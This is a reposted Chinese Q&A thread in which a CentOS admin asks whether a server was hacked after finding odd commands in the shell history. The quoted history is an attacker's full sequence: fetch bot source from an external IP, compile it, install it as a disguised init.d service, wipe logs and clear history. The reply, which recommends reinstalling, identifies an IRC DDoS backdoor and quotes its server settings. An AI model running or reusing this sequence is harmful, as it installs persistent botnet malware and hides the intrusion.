centos – 我的网络服务器是否遭到入侵?

前端之家收集整理的这篇文章主要介绍了centos – 我的网络服务器是否遭到入侵?前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
参见英文答案 > How do I deal with a compromised server?13个
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
  1. unset HISTFILE
  2. mkdir /usr/lib/tmp
  3. cd /usr/lib/tmp
  4. wget http://188.72.217.17/mzb.c -o /dev/null
  5. wget http://188.72.217.17/windef.h -o /dev/null
  6. gcc mzb.c -o /bin/bot -lpthread
  7. rm -rf mzb.c
  8. rm -rf windef.h
  9. wget http://188.72.217.17/botsupport.sh -o /dev/null
  10. chmod +x botsupport.sh
  11. mv botsupport.sh /etc/init.d/httpd2
  12. cat /etc/init.d/network > /etc/init.d/network.bp
  13. echo \#\!/bin/sh > /etc/init.d/network
  14. echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
  15. cat /etc/init.d/network.bp >> /etc/init.d/network
  16. cat /dev/null > /var/log/lastlog
  17. history -c
  18. nohup /etc/init.d/httpd2 &

(为了清晰起见,用&换成了换行符)

我永远不会运行这些命令,永远!这是怎么发生的,我的服务器被黑了吗?我立即改变了我的root密码,但是希望有人可以对这里发生的事情做出正面或反面.

我看到源代码中对ddos机器人的引用,我和我的同事都非常关注!

提前致谢!

是的,你被黑了.黑客安装了一个IRC后门,你正在连接到这个IRC服务器:
  1. const int port = 1254;
  2. const char channel[] = "#test";
  3. const char password[]= "pass";
  4. const char server[] = "heathen.cc";

bot herder可以在您的服务器上执行任何命令.我建议关闭服务器并立即重新安装.机器人有一些DDoS攻击功能,DNS泛洪,同步洪水和ICMP泛滥.它也适用于非常酷的窗户.有一个非常古老的传播模块来感染myDoom.这看起来像一些旧的恶意软件.

猜你在找的CentOS相关文章